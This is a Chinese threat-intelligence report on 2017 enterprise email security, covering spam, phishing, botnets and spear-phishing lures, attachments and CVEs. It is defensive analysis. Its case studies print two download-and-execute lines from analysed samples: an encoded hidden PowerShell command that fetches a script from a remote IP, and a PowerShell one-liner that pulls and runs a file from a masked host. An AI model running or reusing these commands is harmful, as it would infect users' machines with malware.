僵尸网络鱼叉邮件摘要第一章电子邮箱的使用与规模

主要观点

电子邮箱的使用

非正常邮件的收发

僵尸网络

鱼叉邮件

摘 要

第一章 电子邮箱的使用与规模一、电子邮箱的使用规模

根据Coremail论客与360威胁情报中心的联合监测，同时综合网易、腾讯、阿里巴巴等主流企业级邮箱服务提供商的公开数据进行分析评估，截止2017年12月，活跃的中国政企机构独立邮箱域名约为500万个，中国境内企业级电子邮箱活跃用户规模约为1.2亿。

从电子邮箱的使用情况来看，2017年，全国企业级电子邮箱用户共收发各类电子邮件约5861.9亿封，平均每天收发到电子邮件约16.1亿封。其中，正常邮件占比约为25.4%，普通垃圾邮件占比为64.7%、钓鱼邮件4.08%、带毒邮件2.12%、谣言反动邮件2.23%，色情、赌博等违法信息推广邮件约1.47%。也就是说，2017年，在邮件系统收发的邮件中，仅有约1/4为正常邮件，垃圾邮件及其他各类非法、恶意邮件等非正常邮件的数量，是正常邮件数量的三倍左右。

仅就正常邮件而言，统计显示，全国企业级邮箱用户在2017年共收发正常电子邮件约1488.9亿封，平均每天发送正常电子邮件约4.08亿封，人均每天发送电子邮件约3.4封。不同于个人邮箱，企业级邮箱的主要用途是办公。因此，同一机构内部邮件互发往往会比较频繁。抽样统计显示，企业用户发送的电子邮件中，约30.8%为机构内部邮件，21.4%为外部邮件，47.8%为内外通发邮件（收件人既有机构内部，也有机构外部）。

二、电子邮箱用户行业分布

对中国政企机构独立邮箱域名的抽样分析显示，工业制造类企业注册的邮箱域名最多，占比为27.6%，其次是交通运输行业占比9.3%，外资机构占比8.6%；还有IT信息技术占比6.1%，互联网企业占比5.9%，金融行业占比5.6%等，这些都属于电子邮箱使用独立域名较多的行业。

如果从正常邮件的发送量上来看，工业制造和教育培训机构发送的邮件数量最多，占比均为16.7%；其次是媒体占比为13.7%，交通运输行业占比10.6%；还有IT信息技术占比5.6%，科研机构占比5.5%，互联网企业占比4.4%，金融行业占比4.3%，也都是邮件发送量较多的行业。

对比独立邮箱域名注册量和邮件发送量，可以看出，就单个政企机构而言，教育培训，媒体、科研机构、医疗卫生等行业对邮件办公的依赖度最高。

特别的，本次报告对.edu（教育）、.org（组织机构）和.gov（政府）三个域名的邮箱使用情况进行了分析。其中，.edu邮箱域名在全国占比为4.53%，.org和.gov的邮箱域名占比均约为0.99%。而从正常邮件发送量上来看，.edu邮箱占13.5%，.org邮箱占0.85%，.gov邮箱占0.57%。

三、电子邮件的地域分布

统计显示，中国政企机构使用的企业级邮箱的服务器呈现出少数地区高度集中的状态。从邮箱域名数量统计来看，约半数以上的企业级邮箱服务器设在杭州（53.0%）；其次是北京，占比为16.3%；深圳排第三，占比为10.0%。下图给出了中国企业级邮箱服务器城市分布情况。

而从国内企业级邮箱的活跃用户数量来看， 广州用户最多，占全国用户数的10.6%；其次为北京，占全国用户数的9.9%；上海排第三，占全国用户的7.0%。下图给出了中国企业级邮箱活跃用户数排名全国TOP10的城市及其用户数在全国的占比。

四、电子邮件的时域分布

根据Coremail论客与360威胁情报中心的联合监测显示，2017年3月是企业用户正常电子邮件收发量的全年高峰，其次是11月和9月。而从非正常邮件（包括垃圾邮件、钓鱼邮件、带毒邮件、违法邮件等）收发量来看，10月是2017年的最高峰，其次是11月和9月。下图给出了2017年中国企业级邮箱用户每月邮件收发量分布情况。

以一周七天为周期进行分析可以发现，周三、周四是企业用户正常电子邮件收发的高峰期，而周六、周日的发送的正常电子邮件则非常少。非正常邮件每周的发送高峰也在周三和周四，但周六和周日也保持了较高的发送量。下图给出了中国企业级邮箱用户每周邮件收发量分布情况。

以一天24小时（仅限工作日）为监测周期进行分析可以发现，正常邮件在工作日的上午和下午各有一个收发高峰期，而非正常邮件的收发量在全天都比较均衡，且凌晨0点-2点的收发量相对其他时段更高一些。

第二章 垃圾邮件一、垃圾邮件的规模

根据Coremail论客与360威胁情报中心的联合监测评估，2017年，全国企业级邮箱用户共收到各类垃圾邮件（不包括钓鱼邮件、违法邮件和带毒邮件等）约3792.6亿封，约占企业级用户邮件收发总量的64.7%，是企业级用户正常邮件数量的2.5倍。全国企业级用户平均每天收到约10.4亿封各类垃圾邮件。

二、垃圾邮件发送源

Coremail论客与360威胁情报中心对垃圾邮件的发送源头进行了分析。从发送者邮箱域名归属情况来看，来自国内的垃圾邮件最多，占总量的约30.4%，来自巴西的垃圾邮件次之，占总量约27.1%，第三是美国，约占9.6%。

如果从发送垃圾邮件的服务器IP归属地来看，美国排名第一。来自美国邮件服务器的垃圾邮件占国内企业级用户收到垃圾邮件总量的49.6%，接近一半；中国排名第二，国内邮件服务器发送的垃圾邮件占垃圾邮件总量的38.4%。二者之和约为垃圾邮件总量的88.0%。

仅就国内情况来看，根据发送者的域名归属地来看，来自北京的垃圾邮件发送者最多，占国内垃圾邮件发送总量的21.6%，其次为广东省，占15.7%，浙江省，占14.8%。下图给出了国内垃圾邮件发送源域名归属省份TOP10及其垃圾邮件发送量占比情况。

下图给出了国内垃圾邮件发送源域名归属城市TOP10及其邮件发送量占比情况。

对发送垃圾邮件的邮箱域名进行抽样行业分析显示，来自在华境外机构的域名占比最高，为35.5%；其次是工业制造，占比12.4%；互联网企业排第三，占比7.8%。下图给出了国内垃圾邮件发送源行业分布。

三、垃圾邮件受害者

从收到垃圾邮件的受害者服务器所在地来看，浙江省用户收到的垃圾邮件最多，共收到了占比高达全国35.0%的垃圾邮件；其次为广东省，收到了全国16.8%的垃圾邮件；北京排名第三，收到了全国15.5%的垃圾邮件。下图给出了国内企业级邮箱用户中垃圾邮件受害者的省级行政分布TOP10。

从城市来看，北京用户收到的垃圾邮件最多，收到了全国约15.5%的垃圾邮件。其次是杭州用户，收到了全国13.0%的垃圾邮件。深圳用户排第三，收到了全国5.9%的垃圾邮件。下图给出了国内企业级邮箱用户垃圾邮件受害者城市分布TOP10。

四、垃圾邮件时域分布

根据Coremail论客与360威胁情报中心的联合监测显示，2017年，垃圾邮件的发送高峰出现在10月，占比达全年的13.0%；1月最低，全年占比为4.8%。下图给出了2017年国内垃圾邮件受害者每月垃圾邮件发送量分布。

从一周分布来看，周三和周四的垃圾邮件发送量平均最高，占比均为16.4%、而周一最少，占比为11.3%。但总体来看，垃圾邮件的发送量在一周之内都比较平均。

从工作日24小时来看；垃圾邮件发送量的全天分布比较均匀，但整体上呈现出自凌晨至午夜不断下降的趋势。

而从非工作日来看，虽然大体上也呈现出自凌晨至午夜的不断下降趋势，但下降速度更快更明显：0点至1点的发送量最高，占全天的6.9%；而18点以后，每个小时的垃圾邮件发送量都不超过全天的3%，最高点比最低点多近1.6倍。

造成这种“凌晨攻击”现象的原因，很可能是因为垃圾邮件的攻击者更愿意在邮件服务器的使用低峰期发起攻击，这样更不容易被用户和管理员察觉。

五、垃圾邮件与僵尸网络

根据Coremail论客与360威胁情报中心的联合监测，2017年下半年，僵尸网络开始被大量的应用于垃圾邮件攻击。综合统计显示，在2017年Coremail论客截获的所有垃圾邮件中，至少有10%以上的垃圾邮件是由僵尸网络产生。

与传统的垃圾邮件攻击方式不同，使用僵尸网络发送垃圾邮件的攻击者并非是通过少数被控制的邮箱集中大量发送内容完全相同的电子邮件，而是通过其控制的大量散布在全球各地的各类电子邮箱，分时、分布式的发送大量内容并不完全相同，但具有一定相关性的垃圾邮件。

由僵尸网络发送的垃圾邮件有以下几不同于传统垃圾邮件攻击的特点：

垃圾邮件的发送源通常会零散的分布在全球各地；

单个被控制的邮箱在短时间内发出的垃圾邮件数量并不多，所以不易被察觉；

被攻击的目标邮箱也呈现分布式状态，一般没有明显的共性；

同一攻击者发出的垃圾邮件在行为、内容上具有一定相关性，但大多并不完全相同。

由于僵尸网络发送垃圾邮件的这些特点，使得大多数传统的反垃圾邮件网关及传统的反垃圾邮件策略难以奏效。只有通过大数据关联分析技术，才能发现此类攻击的踪迹并进行有效的防护。也正是由于僵尸网络发送的垃圾邮件难以防范，所以这种攻击方式的使用在2017年8月以后大幅增长。预计未来1-2年内，僵尸网络有可能成为最主要的垃圾邮件发送源。

下图给出了2017年各月僵尸网络发送垃圾邮件数量的规模估算。考虑到可能仍有大量僵尸网络的垃圾邮件攻击行为未被发现，所以，僵尸网络实际发送的垃圾邮件规模可能更大。

第三章 钓鱼邮件一、钓鱼邮件的规模

根据Coremail论客与360威胁情报中心的联合监测评估，2017年，全国企业级邮箱用户共收到各类钓鱼邮件约239.2亿封，约占企业级用户邮件收发总量的4.08%，平均每天约有6553.4万封钓鱼邮件被发出和接收。

二、钓鱼邮件发送源

根据Coremail论客与360威胁情报中心联合监测，钓鱼邮件的发送者遍布全球，其中，来自巴西的钓鱼邮件最多，占国内企业用户收到的钓鱼邮件的39.4%；其次是捷克，约占9.6%；中国排名第三，约占8.7%。针对国内企业级用户发送垃圾邮件最多的十个国家及其发送钓鱼邮件数量的占比情况如下图所示。

三、钓鱼邮件受害者

从收到钓鱼邮件的受害者服务器所在地来看，浙江省收到的钓鱼邮件最多，有39.7%的钓鱼邮件被发送至浙江用户；另有约25.2%的钓鱼邮件被发送给广东用户；约14.6%的钓鱼邮件被发送给北京用户。国内钓鱼邮件受害者数量TOP10省级行政区分布如下图所示：

国内钓鱼邮件受害者所在城市也比较集中，排名前十城市用户收到的钓鱼邮件数量，占钓鱼邮件总数的73.7%。其中，杭州排名第一，约占20.7%；北京第二，约占14.6%、深圳紧随其后，占13.9%。具体TOP10城市排名如下所示

四、钓鱼邮件时域分布

由于在2017年，钓鱼邮件在时域分布上有非常明显的不同于垃圾邮件的特征，所以本章特别对钓鱼邮件的时域分布情况展开分析。

根据Coremail论客与360威胁情报中心的联合监测，2017年，钓鱼邮件的收发量主要集中在第四季度。11月收发量最多，占全年的44.9%，1月最少，仅占全年的0.87%。各月份占比情况如下图所示：

以一周七天为观察周期，抽样分析发现：周三钓鱼邮件收发量最多，平均约占一周的25.7%，而周一最少，只约占一周的7.4%。特别值得注意的是：正常邮件在周末的发送量较低，垃圾邮件的发送量在一周内每天都相对平均，而钓鱼邮件却是周一和周二发送量明显低于其他时间，周三是最高峰。产生这种奇特现象的原因还有待进一步分析。

抽样分析还显示，在一天24小时中，无论是工作日还是非工作日，凌晨0点-1点，15点-21点，往往是钓鱼邮件的高发期。而在非工作日期间，凌晨0点-1点，凌晨4点-5点，也是钓鱼邮件的高发期。对于钓鱼邮件的这一活动特点产生的原因，还有待于进一步研究。

第四章 带毒邮件

根据Coremail论客与360威胁情报中心联合监测评估，2017年，全国企业级用户共收到约124.3亿封带毒邮件，约占2017年企业级邮箱用户收发邮件总量的2.12%。平均每天约有3404.7万封带毒邮件被发出和接收。

抽样分析显示：在电子邮件携带的病毒文件中，非PE文件占比为97.5%，PE文件占比约2.5%。

在携带非PE文件病毒样本的邮件中，98.8%的邮件携带病毒文件为vbs程序。

在携带PE文件病毒样本的邮件中，32位PE程序约占58.2%， 32位PE with UPX程序约占33.0%，.NET程序约占7.6%。

第五章 鱼叉邮件的全球攻击一、概述

鱼叉邮件是指攻击者针对特定目标投递特定主题及内容的欺诈电子邮件。相比于一般的钓鱼邮件，鱼叉邮件往往更具迷惑性，同时也往往具有更加隐秘的攻击目的。

对于鱼叉攻击邮件，为何用户容易中招呢？360互联网安全中心的安全专家们对这一问题展开了深入的分析。分析发现，这些鱼叉攻击邮件在制作手法和攻击技术等方面通常并没有什么特别之处，也很少采用什么新型技术，但是，却普遍采用了社会工程学的伪装方法。攻击者会精心构造邮件主题、邮件内容及附带的文档名，使其极具欺骗性、迷惑性，导致很多用户中招。此外，部分用户安全意识只停留在可执行的恶意程序上，对邮件中附带的恶意文档防范意识较弱。

鉴于此种情况，360互联网安全中心和360威胁情报中心对2017年全球范围内的鱼叉攻击邮件样本进行抽样分析与研究，希望能够借此帮助更多的用户提高安全意识，对此类鱼叉攻击邮件有更直观的感受，有效防范此类恶意攻击。

需要说明的是：本次报告的研究范围限定在以恶意文档作为附件来进行伪装和攻击的鱼叉攻击邮件，其中恶意文档主要是指包含了病毒代码或者漏洞利用的伪装性攻击文档，本章节的研究范围不包括除鱼叉攻击邮件以外的其他恶意邮件（如垃圾邮件、钓鱼邮件等），也不包括通过URL链接引导用户跳转到指定的网站利用浏览器漏洞或者其他欺骗信息进行攻击的情况。

二、鱼叉攻击邮件综合分析（一）邮件主题分析

通过对2017年鱼叉攻击邮件抽样分析统计显示，以订单类为主题的鱼叉攻击邮件最多，占比高达39.8%，主题关键字涉及订单、RFQ（Request For Quotation)、采购单、PO（PurchaseOrder）等，并且此类邮件的内容通常与主题相符合，内容通常有如下几种形式：

请给出附件订单最优惠价格；

请参考我们公司以往订单中产品的价格等

排名第二的是支付类，占比为19.4%，涉及的主题主要有Payment、Invoice（发票）、Balance Payment Receipts等，此类主题的邮件内容通常有：

附件为我们公司的支付方式；

附件为我们公司寄出的发票；

麻烦确认附件的支付信息。

以上这两类邮件通常是用于攻击公司，并且攻击者在进行攻击时会针对主题设置的相应邮件内容。

除了以上两类，排名第三的是无主题，占比为14.7%。此类邮件缺少主题甚至正文，只携带恶意附件。之所以这些邮件不设置主题，主要原因有两方面：

缩短鱼叉攻击邮件制作时间；

为了方便群发邮件，由于攻击者想要攻击的人群多样，很难找到适合所有收件人的主题。

在2017年5月12日爆发了WanaCry（永恒之蓝）勒索病毒后，很多变形后的勒索软件就是通过空白主题的邮件进行广泛传播的。

因此，提醒用户要提防此类邮件（即缺少正文和主题的邮件），不要轻易打开，最好是直接将此类邮件扔进垃圾箱。

此外，以通知类和政策类为主题的邮件经常出现在APT攻击中，主题如xx大会召开、颁布新政、战略计划等，针对是陌生人发来的此类主题的邮件也当特别注意。隐私类主要是指以xx简历、xx聚会照片、xx体检报告、xx工资为主题的邮件。

还有其他一些主题就比较广泛，主要有诱导执行类主题，还包括节日祝福、xx培训、backup、代开发票、股票信息等。其中诱导执行类主题的邮件携带的恶意附件多为宏病毒文档，这是由于很多用户默认Office设置是检测到宏代码发出提醒，这导致攻击者会在邮件主题以及内容中添加诱导内容，如点开“允许”按钮才能查看文档内容等，在好奇心的驱动下，普通用户很容易中招。

（二）攻击行业分析

抽样统计显示，企业最易成为攻击者通过鱼叉攻击邮件进行攻击的对象，占比高达61.5%，这里所说的企业主要包括互联网、IT信息技术、生活服务、批发零售等企业。之所以企业成为了通过鱼叉攻击邮件进行攻击的首要目标，主要原因有以下两点：

企业数量众多，并且多数攻击以获取经济利益为目的，这类攻击通常将企业作为攻击目标。

企业的部分邮箱很容易暴露，如公司发布招聘信息，这可以让攻击者很容易向该邮箱发送带有恶意附件的邮件。

其次是金融机构占比较大，达到了14.7%，这里所说金融机构主要是指银行、证券公司、保险公司、信托公司，邮件内容及邮件携带的恶意附件通常是有关汇率及银行账单信息等。虽然攻击这类机构有较高的风险，但对这类机构的攻击可获取巨大的利益，因此对金融机构得攻击仍然占据着较大比例。

排名第三的是政府机构，达到了7.1%，邮件携带的漏洞文档一般是新闻稿、各国出台的新政策及向政府部门提出的建议等；其次是军事机构和科研教育机构，达到了5.2%和4.2%，这类攻击通常由具有政治背景的APT组织发起，攻击往往带有政治目的。

另外需要说明的是，“其他”类别占据了7.3%，这部分邮件攻击目标涉及到普通个人、医疗卫生、协会团体等多个方面。上面提到的这些邮件通常会配有相应的邮件内容、主题、并且邮件携带的恶意附件也会含有伪装内容。

因此，通过邮件传播的恶意附件极具欺骗性，很多安全意识薄弱的用户很容易中招。

（三）攻击地区分析

从下图的鱼叉攻击邮件攻击目标可以看出，受攻击地区主要集中在亚洲、北美洲和欧洲，排名第一的是亚洲，占比为29.8%，其中主要包括中国、越南、菲律宾、韩国、日本、哈萨克斯坦、伊朗、巴勒斯坦等国。其次是北美洲，占比为23.1%，主要包括加拿大、美国、巴拿马等国。排名第三的是欧洲，占比也超过了20%，受攻击国家主要有俄罗斯、乌克兰、德国、荷兰、罗马尼亚等国。紧随其后的是大洋洲、非洲以及南美洲，占比分别为9.9%、8.7%、6.6%。

通过鱼叉攻击邮件攻击地区可以知道，全球多个国家遭受到了鱼叉式网络攻击，这变相说明了此类攻击仍然是现今攻击者使用的一种主流攻击方式，很多攻击者通过社会工程学获取用户或机构的邮箱地址，然后伪装其相应的主题，携带恶意附件，进行攻击。因此在这里也提醒用户对于不知来历的文档，特别是携带文档的邮件，应特别小心，否则很容易中招。

（四）发件邮箱分析

抽样统计显示，55.7%的发件人使用企业专用邮箱，如@tsl.com、@o2.pl、@ dhl.com、@ srwealth.biz、@web.de、@nesma.com等。这类邮箱分为两种情况：

攻击者获取了某个企业员工的邮箱，通过该邮箱发送鱼叉攻击邮件给企业其他员工；

攻击者直接伪造邮件发件人，以免被安全从业人员溯源。

从社会工程学上看，发件人邮箱为企业的邮箱，并配有相应的邮件内容，更容易取得用户的信任。__

另外44.3%发件人使用的是个人邮箱，其中Gmail邮箱比例占据较大，达到了19.3%，主要由于其强大的邮件功能、绝佳的用户体验，让其全球具有很多用户。因此，部分攻击者利用其注册的Gmail邮箱用于网络攻击。另外，Outlook邮箱占据了7.2%，排名第三，这是由于很多用户为了方便，使用该类型邮箱与Office其他套件配合办公，在进行网络攻击时也采用了此类邮箱。最后mail.ru占据了4.4%，该类型邮箱主要在俄罗斯使用。

需要说明的是，“其他”类别占据了13.4%，这部分主要包括yahoo邮箱、foxmail邮箱、163邮箱等。因此在这里提醒用户对于含有附件的未知电子邮箱，应特别小心，不要被好奇心驱动而打开附件。

三、鱼叉攻击邮件携带文档分析（一）携带文档类型

通过对2017年出现的鱼叉攻击邮件抽样分析统计显示，攻击者在邮件中最喜欢携带的文档为Office文档，占比高达65.4%。主要原因有以下两个方面：一是Office文档类型众多，从而导致漏洞类型比较多，攻击者可供选择的载体多；二是Office用户群体庞大。

其中在Office系列中Word文档类型尤为突出，占比高达81.8%，主要原因有也有两点：一是很多恶意宏文档喜欢选用Word作为载体；二是Word软件相关的高可利用的漏洞比较多，如CVE-2017-0199。

其次在Office系列排名靠前的是PowerPoint文档，占据了11.7%，很多攻击者喜欢利用 PowerPoint OLE 钓鱼文档，将PowerShell代码或恶意PE文件嵌入PPT 文档中进行攻击，此类攻击一般Office默认会弹出安全警告窗口，但是安全意识较弱的用户容易选择放行。

除了Office文档之外，攻击者也喜欢利用将RTF（Rich Text Format）文档作为附件，其占比达到了27.3%。由于RTF文件结构简单，能交换各种文字处理软件之间的文本，并且默认情况下RTF类型的文件系统会调用Word程序来解析，因此很多攻击者选择使用RTF文档，并嵌入恶意OLE对象用于触发漏洞或绕过Office的安全保护机制。此外，PDF文档也占据7.3%，该类文档中通常包含一些恶意的JavaScript代码，这些代码会连接云端下载恶意程序，当然还有利用PDF漏洞进行攻击的文档。

因此，在此提醒用户，对含有文档附件的电子邮件应当特别注意，不要轻易打开文档，以免中招。

（二）攻击触发方式

这些鱼叉攻击邮件附件一旦运行后，是怎么样运行恶意程序或代码呢？

抽样统计显示，鱼叉攻击邮件携带文档为恶意宏文档的比例最大，达到了59.3%。宏是微软公司为其Office软件包设计的一个特殊功能，为了避免一再地重复相同的动作而设计出来的一种工具，但是很多攻击者在Office文档中嵌入恶意宏代码来达到自己目的，如远端下载恶意程序。此外，Office软件的宏功能在macOS上也能良好运作，因此相对于漏洞文档来说，恶意宏文档制作较简单，攻击成本较小，并且兼容性更强，这也是恶意宏文档如此广泛的原因。针对该类文档的防护，建议广大用户对于未知的宏代码不要轻易运行。

此外，通过系统漏洞来运行恶意载荷排名第二，达到了36.3%。在具体漏洞使用过程中，CVE-2017-0199漏洞被利用的次数最多，相关的漏洞文档占比高达43.3%，这是由于该漏洞为2017年3月爆出的新漏洞，利用方式简单，攻击者只需在VB脚本中配置自己的恶意程序地址就能构造一个恶意文档，因此该漏洞深受攻击者喜爱。排名第二位和第三位分别是CVE-2012-0158和CVE-2015-1641，二者分别占比为18.5%和9.5%。虽然这两类漏洞已经存在较长时间，但由于利用稳定，漏洞利用方法成熟，并且漏洞影响版本较多所以也很受攻击者青睐，其他类别中主要使用的漏洞有CVE-2017-11882、CVE-2017-8759、CVE-2017-11826、CVE-2017-8464、CVE-2014-6352等，需要特别重视的是，Office公式编辑器漏洞CVE-2017-11882在全年的占比不是很高，但是自从该漏洞爆发后广泛被攻击者利用，随着该洞的不断曝光，未来被利用的情况会有所增加。

其他类主要是指嵌入带交互的恶意对象或直接嵌入恶意PE程序的文档，“带交互的恶意对象”利用攻击主要是指 Object Linking攻击和DDE（动态数据交换）攻击。其中嵌入恶意Object Linking文档一般为PowerPoint文档，需要进行交互，含有PowerShell代码，如“Zusy”文档，该文档注册了鼠标悬停回调函数，当用户鼠标悬停在链接上，就调用恶意的PowerShell代码。DDE攻击主要是指攻击者可以创建包含DDE字段的恶意Word或RTF或Outlook文件，打开命令提示符，运行恶意代码。通常情况下，针对带交互的恶意对象的文档攻击，Office应用程序会发出警告提示。因此对此类文档的防护，建议用户对office办公软件中未知的警告提示不要轻易选择开启或确认放行。

（三）最终攻击载荷

下图给出了鱼叉攻击邮件附件最终载荷功能占比，可以看出在所有的恶意载荷中，下载者木马占比最高，占比为38.3%，此类木马是指连接远端下载恶程序。攻击者之所以喜欢选择下载者木马，主要原因有以下三点：

攻击者可以随意替换下载链接下的恶意文件，能更好的达到自己目的；

部分攻击者在使用文档进行攻击时，会将恶意程序直接嵌入文档中，此时为了减少恶意附件和文档的体积，通常选择下载者木马作为载荷；

三是攻击者利用某些漏洞（如CVE-2017-0199）进行攻击时，通常会下载包含PowerShell命令的Visual Basic脚本，这些脚本一般是下载者木马。

排名第二和第三的分别是远控木马、信息盗取木马，分别达到了23.7%和13.9%。远控木马会使用户计算机变成肉鸡，并实时控制用户电脑，上传各种资料，甚至使用肉鸡进行二次攻击，如DDoS等。信息盗取木马主要是指此木马会盗取计算机中Email、浏览器、FTP帐号密码信息，甚至盗取用户计算机中的关键文档。

需要特别引起注意的是，勒索软件占比达到了11.7%，勒索软件是指一种通过加密用户重要文件向用户敲诈钱财的恶意程序，很多用户中招后，即使支付赎金，也未必能找回重要文件。从今年5月12日爆发“WanaCry”（永恒之蓝）和6月27日爆发类Petya这两类勒索软件后，各种勒索软件变体变得很流行，很多攻击者选择采用Necurs（Necurs是全球范围内最大的垃圾邮件僵尸网络，拥有接近五百万被感染的机器）进行广泛传播来获取直接利益。未来勒索软件或许会越来越流行，因为这种盈利模式与技术模式越来越受攻击者喜爱。

四、鱼叉攻击邮件携带文档攻击案例（一）利用漏洞攻击案例

如下是一起利用最近爆出的Office漏洞CVE-2017-11882进行鱼叉邮件攻击的案例，其中邮件主题为“Требования по операциям с карточными продуктами”，收件人为某银行机构，邮件内容是告诉从业者要遵循即将在2017年12月1日生效的相关规定（#CheckedItem），邮件附件名为“Приказ №3120567”（xx命令）。安全意识薄弱的用户通过邮件内容以及附带的文件名会以为会是正常机构发来的通知，从而打开附件中招。通过分析该文档，发现文档中嵌入了恶意载荷，并通过最近刚刚爆出存在17年之久的公式编辑器漏洞CVE-2017-11882触发。

CVE-2017-11882漏洞影响范围相当广，基本上覆盖目前市面上的所有Office版本及Windows操作系统。该漏洞的成因是EQNEDT32.EXE进程在读入包含MathType的OLE数据时，在拷贝公式字体名称时没有对名称长度进行校验，从而造成栈溢出。

分析Приказ №3120567.doc文档，发现该文档实际上为RTF文档，并且内嵌OLE对象，对象用于触发漏洞，漏洞触发成功后，会从远端下载文件，并通过mshta.exe运行。

下载的文件x.txt实际上是一段JavaScript脚本，经过美化后，部分内容如下

再次去混淆、解码后，得到主要的功能函数代码。

powershell -NoP -nOnI -w hIdden -e "JABzAGwAIAA9ACgAWwBjAGgAYQByAF0AOQAyACkAOwAkAGYAZgAgAD0AIAAkAGUAbgB2ADoAYQBwAHAAZABhAHQAYQAgACsAIAAkAHMAbAAgACsAIAAtAGoAbwBpAG4AIAAoACgANgA1AC4ALgA5ADAAKQAgACsAIAAoADkANwAuAC4AMQAyADIAKQAgAHwAIABHAGUAdAAtAFIAYQBuAGQAbwBtACAALQBDAG8AdQBuAHQAIAAxADAAIAB8ACAAJQAgAHsAWwBjAGgAYQByAF0AJABfAH0AKQAgACsAIAAnAC4AcABzADEAJwA7ACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQAwADQALgAyADUANAAuADkAOQAuADcANwAvAG8AdQB0AC4AcABzADEAJwAsACAAJABmAGYAKQA7AGkAZgAgACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAGYAZgApACAAewAkAG0AaQAgAD0AIAAkAGUAbgB2ADoAdwBpAG4AZABpAHIAIAArACAAJABzAGwAOwAkAGUAMgAgAD0AIAAnAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbAAnACAAKwAgACQAcwBsACAAKwAgACcAdgAxAC4AMAAnACAAKwAgACQAcwBsACAAKwAgACcAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAOwBpAGYAIAAoAFsAUwB5AHMAdABlAG0ALgBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAIAB7ACAAJABtAGkAIAA9ACAAJABtAGkAIAArACAAJwBTAHkAcwB0AGUAbQAzADIAJwAgACsAIAAkAHMAbAAgACsAIAAkAGUAMgA7AH0AIABlAGwAcwBlACAAewAgACQAbQBpACAAPQAgACQAbQBpACAAKwAgACcAUwB5AHMAVwBPAFcANgA0ACcAIAArACAAJABzAGwAIAArACAAJABlADIAOwB9ACQAeAAwAD0AKABbAGMAaABhAHIAXQAzADQAKQA7ACQAYQByAGcAMQAgAD0AIAAnAC0AZQB4ACAAYgB5AHAAYQBTAHMAIAAtAEYAaQBsAGUAIAAnACAAKwAgACQAeAAwACAAKwAgACQAZgBmACAAKwAgACQAeAAwADsAcwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AdwBpACAAaABpAGQAZABlAG4AIAAkAG0AaQAgACQAYQByAGcAMQA7AH0A"

上述代码主要是从远端（）下载恶意文件，并执行。

需要注意的是，在分析该漏洞其他样本时，还发现不同的利用方式，它不是通过mshta.exe、powershell.exe、cmd.exe等程序从网络加载恶意程序，而是通过内嵌两个对象，其中一个对象为恶意PE文件，漏洞触发后直接运行恶意程序，这种方式在用户断网的情况下仍然可以达成有效攻击。因此可以看出，该漏洞能让攻击者在无需用户交互的前提下在受害者计算机中执行代码，在攻击效果上堪比CVE-2012-0158漏洞，因此后期该漏洞很可能成为各大攻击组织的必备漏洞利用库之一。

在此，建议广大用户及时更新系统漏洞补丁，减少漏洞文档触发的可能性。

（二）带毒宏攻击案例

如下是一起利用恶意宏文档进行鱼叉邮件攻击的案例，其中邮件主题为Job Application（工作申请），邮件内容大致是攻击者伪装成自己经验与该工作比较契合，麻烦查看简历，邮件附件名为“Adrena简历”。很多用户在看到该邮件内容、主题以及附件名称，会以为是正常的工作申请，从而打开简历中招。

通过分析Adrena-Resume.doc文档，发现文档中嵌入了恶意宏代码，并且打开文档就会提醒用户该文档是Office早期版本创建，请点击允许执行内容按钮查看内容，如下图所示。如果用户选择点击执行按钮实际上是运行恶意宏代码。

查看宏代码，发现宏代码是经过混淆的，去混淆后，这段宏代码主要功能是从远端（***.***.***/111.jpg）下载恶意程序，保存在临时目录并执行。

此外，需要特别注意的是，Office软件的宏功能在macOS上也能良好运作，虽然macOS系统上宏功能是默认关闭的，但仍然会有运行安全提示，有些警惕性不强的用户打开文档后，往往可能忽略掉安全提示，直接运行宏代码而中招。因此针对这两种系统，攻击者可以使用同一份攻击代码进行跨平台攻击，例如，在2017年8月份，由360核心安全团队捕获到的跨平台攻击样本“双子星”，该样本兼容了Windows和macOS两操作系统，用户无论是在哪个系统打开这个文档，都有可能中招。此样本是使用宏内建的预定义语法对Mac和Windows平台进行兼容，如果是Mac平台，则采取一句话shell脚本执行Python恶意代码的荷载攻击方式。

在此，提醒广大用户，不要将Office软件宏设置成自动运行选项，并且对于未知的宏代码不要轻易运行。

（三）带交互的恶意对象攻击案例

如下是一起利用带交互的恶意对象文档进行鱼叉邮件攻击的案例，其中邮件主题为“Purchase orders”（采购订单），邮件内容大致是请参阅附件购买设备，邮件附件名为“order&prsn.ppsx”。部分用户在看到该邮件内容、主题以及附件名称，会以为是真实的订单内容，从而打开ppsx文档。

通过分析order&prsn.ppsx文档，发现文档中既没有利用漏洞也未嵌入宏，而是利用带交互的恶意对象进行攻击（Object Linking攻击）。该文档以恶意PPT文件为载体，通过鼠标悬停事件执行PowerShell代码。

当PowerPoint演示文稿打开时，它将显示文本“正在加载...请等待”作为超链接，显示为用户的蓝色超链接，当用户将鼠标悬停在此文本上，会导致PowerPoint执行PowerShell。但是如果开启了受保护视图安全功能，Office会通知用户风险，用户如果启用内容，PowerShell才会代码被执行。

Powershell代码如下：

powershell -NoP -NonI -W Hidden -Exec Bypass “IEX （New-Object System.Net.WebClient).DownloadFile（'http:'+[char] 0x2F+[char] 0x2F+'****.nl'+[char] 0x2F+'c.php',\“$env:temp\ii.jse\”); Invoke-Item \“$env:temp\ii.jse\”“

上述代码主要是连接远端地址hxxp://****.nl/c.php下载恶意文件并执行。

需要注意的是，另外一种带交互的恶意对象攻击（DDE攻击）通常是通过powershell.exe、cmd.exe、mshta.exe等程序从网络加载恶意程序，此类攻击Office应用程序会发出关于包含指向其他文件的链接的文档警告，因此这种攻击跟 Object Linking攻击一样，不要在Office发出警告提示时，轻易选择开启或确认放行。

（四）嵌入带毒程序攻击案例

